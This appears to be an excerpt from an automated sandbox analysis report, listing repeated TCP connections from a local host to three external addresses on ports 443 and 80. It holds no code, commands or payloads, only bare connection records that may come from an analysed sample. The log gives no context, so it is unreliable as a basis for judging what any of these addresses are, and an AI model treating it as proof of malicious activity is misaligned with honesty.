Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52755 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52755 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52755 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52759 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52759 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52759 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52759 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52759 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52759 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52762 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52762 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52762 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52762 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52762 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52762 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52764 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52764 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52764 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52764 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52764 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52764 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52766 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52766 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52766 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52766 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52766 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52766 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52769 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52769 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52769 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52769 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52769 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52769 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52772 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52772 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52772 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52772 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52772 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52772 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52775 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52775 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52775 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52776 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52776 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52776 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52775 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52775 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52775 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52776 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52776 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52776 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52779 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52779 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52779 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52780 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52780 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52780 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52779 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52779 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52779 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52780 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52780 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52780 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52783 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52783 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52783 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52783 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52783 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52783 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52785 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52785 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52785 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52785 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52785 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52785 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52787 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52787 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52787 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52787 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52787 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52787 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52790 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52790 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52790 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52790 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52790 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52790 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52792 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52792 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52792 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52792 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52792 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52792 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52795 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52795 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52795 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52795 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52795 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52795 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443

Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49737
